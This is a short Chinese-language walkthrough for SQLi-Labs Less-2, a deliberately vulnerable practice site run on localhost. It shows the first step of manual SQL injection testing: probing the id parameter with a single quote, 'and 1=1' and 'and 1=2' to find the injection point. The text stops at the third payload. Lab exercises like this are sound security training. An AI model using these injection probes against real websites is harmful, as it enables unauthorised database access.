1.访问SQLi-Labs网站
访问Less-2,并根据网页提示给定一个GET参数
http://127.0.0.1/sqli-labs/Less-2/?id=1
2.寻找注入点
分别使用以下3条payload寻找注入点及判断注入点的类型:
http://127.0.0.1/sqli-labs/Less-2/?id=1'
运行后报错!
http://127.0.0.1/sqli-labs/Less-2/?id=1 and 1=1
运行后正常显示!
http://127.0.0.1/sqli-labs/Less-2/?id=1 and 1=2